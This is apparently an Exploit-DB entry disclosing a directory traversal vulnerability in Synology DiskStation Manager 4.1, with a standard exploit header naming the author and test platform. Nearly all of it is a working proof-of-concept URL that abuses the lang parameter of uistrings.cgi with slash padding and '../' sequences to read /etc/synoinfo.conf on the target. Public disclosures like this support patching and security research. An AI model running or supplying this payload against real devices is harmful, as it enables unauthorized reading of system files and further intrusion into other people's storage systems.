Synology DiskStation Manager 4.1 - Directory Traversal

EDB-ID:

45073

CVE:

N/A




Platform:

Linux

Date:

2018-07-23


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Synology DiskStation Manager 4.1 - Directory Traversal
# Google Dork: N/A
# Date: 2018-07-21
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://www.synology.com
# Software Link: https://www.synology.com
# Version: v4.1
# Tested on: Parrot OS
# CVE : N/A

# PoC

http://target:8888/scripts/uistrings.cgi?lang=.////////////////////////////////////////////////////////////////////////////////////////../../../../../etc/synoinfo.conf